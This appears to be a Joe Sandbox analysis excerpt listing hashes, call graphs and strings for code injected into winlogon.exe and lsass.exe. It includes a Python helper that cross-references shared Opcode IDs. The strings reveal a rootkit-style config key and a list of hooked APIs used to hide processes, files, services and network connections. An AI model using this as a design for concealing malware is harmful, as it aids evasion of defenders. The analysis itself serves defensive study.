                        • Instruction ID: 4a3cbd926c2ff67caed56cc86b37f60de1dd5d3bcd68790c06f0eef6869e381a
                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction Fuzzy Hash: 31117322750F418AEB00CF61E8593A833B4F318758F850E26EA6D82795DF78C194C790
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction ID: 1f9f842b75453c5857f6b2e56ffc77b939292a8ca7035f958eb5257443a8da6b
                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction Fuzzy Hash: EE71B4362407C2C6E765DF27D8483AA6794F389B84F46042FDE0A53B9ADF35C685CB20
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: CallTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3163161869-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: 84d4d0f52c9fe8424e130a51802f206c56cb391b230e05c660d89bf47d82b7fc
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: E6618633601B858AE720DF66D4443AD77B0F348B88F09451AEF4917B99DB38D596CB10
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction ID: f62a7e3c712747ec3032839da713c06c279082095f181f860e761592c369468b
                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction Fuzzy Hash: 4A51F8326843C3C1E6749A2BE05C36A6B61F385784F56012FDD9A03B5BDB39C984CFA0
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: U
                        • API String ID: 442123175-4171548499
                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction ID: 3c3291cdee80793f077ca875b2c93d8f285802d27222ba8780e6ad337528432c
                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction Fuzzy Hash: 8541D532755B8282DB60CF26E8487A977A0F3987D4F92402AEE4DC7785EB3CC481CB51
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: ExceptionFileHeaderRaise
                        • String ID: csm
                        • API String ID: 2573137834-1018135373
                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction ID: 207757b0be7941945bbc5168ef3fd331411ff0e9450000233a5a2120af0f3481
                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction Fuzzy Hash: 01114F32215B8182EB618F16F44435A77E5F788B98F594229EF8C47759EF3CC591CB00
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: ierarchy Descriptor'$riptor at (
                        • API String ID: 592178966-758928094
                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction ID: a257186f3850c7b0ed0a211b5e55a5bcdb9ea12776083c4015b6f529102d0367
                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction Fuzzy Hash: 16E08661681B8990DF018F62E84429833A0EB59B64B499123995C06312FA38D2FAC720
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726515083.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: Locator'$riptor at (
                        • API String ID: 592178966-4215709766
                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction ID: 666d30d5e13efd7c2989cd14f499e6fcad5fce96985e36ef4ac7ff9aefadf28a
                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction Fuzzy Hash: CFE0CD61641B89C0DF018F62E44019873A0F759B54F8AD123CD4C07312FB38D2E6C720
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID:
                        • API String ID: 756756679-0
                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction ID: d4a5e8aca712c33a79de3256f17f9e0da43bbae3851e7c4569dd7d8c7212e1c3
                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction Fuzzy Hash: FD119125641B8581EA44DB67E40C22973A1FB89FC1F5A402EDE4E93767DF39C482C750
                        Memory Dump Source
                        • Source File: 0000003B.00000002.2726580417.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess
                        • String ID:
                        • API String ID: 1617791916-0
                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction ID: 1436bcb16dbf9b340cef29a2e619caaeb5be8261704b43b7e2ccef2ff9d21f13
                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction Fuzzy Hash: 9EE06D35641645C7EB088F63D80C34A36E1FB89F86F86C028C90987352DF7D84D9CBA1
                        Memory Dump Source
                        • Source File: 00000044.00000002.1534012457.00007FF613711000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF613710000, based on PE: true
                        • Associated: 00000044.00000002.1533823196.00007FF613710000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000044.00000002.1534039625.00007FF61371C000.00000002.00000001.01000000.00000009.sdmp
                        • Associated: 00000044.00000002.1534108187.00007FF61371F000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000044.00000002.1534145791.00007FF613720000.00000008.00000001.01000000.00000009.sdmp
                        • Associated: 00000044.00000002.1534766111.00007FF613C49000.00000004.00000001.01000000.00000009.sdmp
                        • Associated: 00000044.00000002.1534802192.00007FF613C4C000.00000002.00000001.01000000.00000009.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_68_2_7ff613710000_eejhedztifcv.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction ID: d34b4cde1b4a9956d39892b6155d3bb7864cdac6d01999df734abe88a0c4c300
                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                        • Instruction Fuzzy Hash: 78B01232D04B0E84E7006F41EC5335833706B08F50F400030C40D67352CEBD50448B14

                        Execution Graph

                        Execution Coverage:0.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:132
                        Total number of Limit Nodes:10
                        execution_graph (the node/edge drawing did not survive extraction; the API calls recorded on its nodes, grouped by entry function in the lsass.exe dump at 0x213BDCE0000, are:)
                        • 213bdcb273c: loop over 213bdcb2858 (LoadLibraryA)
                        • 213bdce1abc: 213bdce1628 (GetProcessHeap, then four calls to 213bdce1268, which reaches GetProcessHeap via 213bdcf6168), followed by nine RegOpenKeyExW calls (213bdce168e through 213bdce1861), each paired with 213bdce12bc (RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, lstrlenW, StrCpyW, and StrCmpIW/StrCmpW via 213bdce152c) or 213bdce104c (RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap) and a RegCloseKey; afterwards a loop at 213bdce1ad2 (Sleep, SleepEx) that also reaches 213bdce1598 (StrCmpIW, StrCmpW) and 213bdce18b4, which releases memory through 213bdce14a4 (GetProcessHeap), 213bdcf6180 and 213bdce14f6 (GetProcessHeap, HeapFree)
                        • 213bdce253c: 213bdce261d (GetFileType), then 213bdce262b (StrCpyW) or 213bdce1a40 (GetFinalPathNameByHandleW, StrCmpNIW, lstrlenW, StrCpyW), then 213bdce3844 (StrCmpNIW), 213bdce3044 (StrCmpIW, then PathCombineW or StrCpyW and StrCatW) and 213bdce1cac (StrCmpIW/StrCmpW via 213bdce152c)
                        • 213bdce202c: 213bdce20b9 (StrCmpNIW), 213bdce1bf4 (GetProcessHeap, 213bdce152c) and 213bdce2f04 (GetProcessHeap, StrCmpNIW, 213bdce1bf4)

                        Control-flow Graph

                        control_flow_graph for 213bdce253c-213bdce27fb (the executed/not-executed colouring did not survive extraction; calls on its basic blocks: 213bdd02cc0, 213bdce8c60 (three times), GetFileType, StrCpyW, 213bdce1a40, 213bdce30a8, 213bdce3844, 213bdce3044, 213bdce1cac)
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction ID: 402ccc82d5c6591d2abd376835e1d3f6cc6d53c76c666844c3b5344b78894b12
                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction Fuzzy Hash: 1371C6B620879987EF24DF25D8483EAA796F3A978CF540036DD0943B89FE36D7458700
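                        As an added example that is not part of the Joe Sandbox report: the function entries above repeat the same Opcode ID across different memory dumps and even different processes. The Opcode ID beginning 54f1dfa0 (API ID FileType, string \\.\pipe\) is listed for the winlogon.exe dump at 0x2E991750000 and again for the lsass.exe dump at 0x213BDCE0000, with a different Instruction ID each time, and the IDs beginning b607b941 and c123fbbb each appear in both winlogon.exe dumps. The script below parses the bullet rendering of these Similarity blocks and lists the Opcode IDs shared across dumps and across processes, which is a quick way to confirm that the same injected code body is present in several hosts. The record layout and the hcaresult_<pid>_<run>_<base>_<process>.jbxd naming are assumptions drawn from the entries on this page, and the sample records are copied from them.

```python
"""Pivot on Joe Sandbox "Similarity" records: which Opcode IDs recur across the
memory dumps of different injected processes?

Added example, not code from the Joe Sandbox report. It assumes the plain-text
bullet rendering of the report's Similarity blocks ("• Key: value" lines, one
block per function entry) and infers the snapshot-name layout
hcaresult_<pid>_<run>_<base>_<process>.jbxd from the names on the page.
"""
import re
from collections import defaultdict

# Constructed input: five records copied from this report's function entries
# (winlogon.exe dumps at 0x2E991720000 / 0x2E991750000, lsass.exe dump at
# 0x213BDCE0000). Fields not needed for the pivot are omitted.
SAMPLE_REPORT = r"""
• Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
• API ID: FileType
• String ID: \\.\pipe\
• Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
• Instruction ID: 1f9f842b75453c5857f6b2e56ffc77b939292a8ca7035f958eb5257443a8da6b
• Snapshot File: hcaresult_59_2_2e991750000_winlogon.jbxd
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction ID: 446d1a1c64522073db0cd5d5834e42522880cf304d97d4b8b40f77ecf9adbd4b
• Snapshot File: hcaresult_59_2_2e991720000_winlogon.jbxd
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
• Instruction ID: f3086e5e95a6481f7f96e1afe717cc730f762cabb17a0b2f305e154ee185ea95
• Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
• API ID: FileType
• String ID: \\.\pipe\
• Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
• Instruction ID: 402ccc82d5c6591d2abd376835e1d3f6cc6d53c76c666844c3b5344b78894b12
• Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
• API ID: Heap$Process$AllocFree
• String ID: S$dialer
• Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
• Instruction ID: 01a705c1139b4e3a3236aaa51ba8ea78d077b3526d5db40ec5641de093292221
"""

# Assumed snapshot naming: hcaresult_<pid>_<run>_<dump base hex>_<process>.jbxd
SNAPSHOT_RE = re.compile(
    r"hcaresult_(?P<pid>\d+)_(?P<run>\d+)_(?P<base>[0-9a-f]+)_(?P<proc>[^.]+)\.jbxd")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+?)\s*:\s*(?P<value>.*?)\s*$")


def parse_records(text):
    """Split the bullet rendering into one dict per function entry."""
    records, cur = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group("key"), m.group("value")
        # A new entry starts at "Source File" (present in the full report) or,
        # when that line was omitted, at the next "Snapshot File".
        if cur is None or key == "Source File" or (
                key == "Snapshot File" and "Snapshot File" in cur):
            cur = {}
            records.append(cur)
        cur[key] = value
        if key == "Snapshot File":
            s = SNAPSHOT_RE.search(value)
            if s:
                cur["process"] = s.group("proc")
                cur["base"] = int(s.group("base"), 16)
    return [r for r in records if "Opcode ID" in r and "process" in r]


def index_by_opcode(records):
    """Opcode ID -> set of (process, dump base, Instruction ID) it was seen in."""
    idx = defaultdict(set)
    for r in records:
        idx[r["Opcode ID"]].add((r["process"], r["base"], r["Instruction ID"]))
    return idx


def shared_across_dumps(records):
    """Opcode IDs seen in more than one (process, dump base) pair."""
    return {op: hits for op, hits in index_by_opcode(records).items()
            if len({(p, b) for p, b, _ in hits}) > 1}


def shared_across_processes(records):
    """Opcode IDs seen under more than one process name, with the sorted names."""
    out = {}
    for op, hits in index_by_opcode(records).items():
        procs = sorted({p for p, _, _ in hits})
        if len(procs) > 1:
            out[op] = procs
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for op, procs in shared_across_processes(recs).items():
        print(f"Opcode ID {op[:16]}... present in: {', '.join(procs)}")
```

                        Run on the real report, the same parser takes the full entries (the "Source File" lines start each record), and an Opcode ID that recurs with differing Instruction IDs is the pattern to look for when confirming that one code body was written into several processes.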

                        Control-flow Graph

                        control_flow_graph for 213bdce202c-213bdce2243 (the executed/not-executed colouring did not survive extraction; calls on its basic blocks: 213bdd02d00, 213bdce2f04 (twice), 213bdce1bbc, StrCmpNIW, 213bdce1bf4)
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: S$dialer
                        • API String ID: 756756679-3873981283
                        • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                        • Instruction ID: 01a705c1139b4e3a3236aaa51ba8ea78d077b3526d5db40ec5641de093292221
                        • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                        • Instruction Fuzzy Hash: C951B2B2B1862887EF61CF25D8487EDA3E6F72879CF459021DE0552B85EB36EB51C300


                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: FinalHandleNamePathlstrlen
                        • String ID: \\?\
                        • API String ID: 2719912262-4282027825
                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction ID: 9a3ceae17c6c449fcd09eca06c2232397e8d057c9f4e4c09271c551668b01824
                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction Fuzzy Hash: 4AF0317230864592EF70CB21E8887D96762F768B9CF945020DA494A558EB3DC74DCB00

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                        • String ID:
                        • API String ID: 1683269324-0
                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction ID: 5d40ba2aa3b61c65a6b29e875bc405932eba3ae14eb689a115a8dbd4c5664118
                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction Fuzzy Hash: 3411E1B161CA0883FF20D720F80DBE92297ABB430EF5001389946451A6FF3BF3488254

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00000213BDCE1628: GetProcessHeap.KERNEL32 ref: 00000213BDCE1633
                          • Part of subcall function 00000213BDCE1628: HeapAlloc.KERNEL32 ref: 00000213BDCE1642
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE16B2
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE16DF
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE16F9
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1719
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE1734
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1754
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE176F
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE178F
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE17AA
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE17CA
                        • Sleep.KERNEL32 ref: 00000213BDCE1AD7
                        • SleepEx.KERNELBASE ref: 00000213BDCE1ADD
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE17E5
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1805
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE1820
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE1840
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE185B
                          • Part of subcall function 00000213BDCE1628: RegOpenKeyExW.ADVAPI32 ref: 00000213BDCE187B
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE1896
                          • Part of subcall function 00000213BDCE1628: RegCloseKey.ADVAPI32 ref: 00000213BDCE18A0
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CloseOpen$HeapSleep$AllocProcess
                        • String ID:
                        • API String ID: 1534210851-0
                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction ID: 5c1e5f493c3240c0c1d6ba6cc6eea2f3c80886ee07ec0849ec39ecbda1c65d01
                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction Fuzzy Hash: 2D31F0F120964943FF50DB26DA593E913A6ABA4BCCF0474319E098B695FE36E771C310

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728820418.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdcb0000_lsass.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction ID: 62858d15b17bcbc33b2ca6a6066d80486455f950e6546258cbebb37c44571cfa
                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction Fuzzy Hash: AF61E132B4969887EF54CF1590087ADB3A3F764BACF588125DE5D07788EA3ADA53C700

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                        • API String ID: 2119608203-3850299575
                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction ID: 5807444a8450fc688cd656404e5327faf8bf80d9ed4d8e3fcbe0e129d3a2233c
                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction Fuzzy Hash: 16B190B2219A9883EF65CF25D4487E9A3A6FB68B8DF445026DE0953794FB36DF40C340
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                        • String ID:
                        • API String ID: 3140674995-0
                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction ID: b5ca2973510a18e9044a362400021c8bf4fd35d0e5851b09ad40746068c8bd5a
                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction Fuzzy Hash: E9311772209A848AEB60DF60E8847EE7366F79474CF44442ADA4E57A98EF39C748C710
                        APIs
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                        • String ID:
                        • API String ID: 1239891234-0
                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction ID: 8c31cb887ca66331edc06f01b646ec043365c389dcc0a630b6fed02098722ee4
                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction Fuzzy Hash: 6B319E76218B8086EB60CF25E8443DE73A1F79975CF500126EA9D47B99EF39C75ACB00

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                        • API String ID: 106492572-2879589442
                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction ID: 9ce6f8576089a91c0a41a3022284374a307a37465a46bb01b2766921063186a7
                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction Fuzzy Hash: BE712A76318A5486EF10DF22E848AD923A6F7A4B8CF402121DE4E47B6DEF36C758C744

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                        • String ID: d
                        • API String ID: 2005889112-2564639436
                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction ID: 7e46c3b6a7d5331c3c7ee4b2a60feacf72bead3f45980719ba22298b4a17c25e
                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction Fuzzy Hash: 42514D76208B8487EB54CF62E5483DA77A2F799F9DF448124DA4A0B758EF3DC259CB00

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000049.00000002.2728913072.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_73_2_213bdce0000_lsass.jbxd
                        Similarity
                        • API ID: CurrentThread$AddressHandleModuleProc
                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                        • API String ID: 4175298099-1975688563
                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction ID: 8f728ad5951c134e967336f2fc31f6c713d23b700de02865da5b7b8926e8932e
                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction Fuzzy Hash: D431E3B411998EA2EF01EF65EC697D4A323BB7435CF801023A44D0656AFF7A934DC391

                        Control-flow Graph

                        APIs
                        Strings
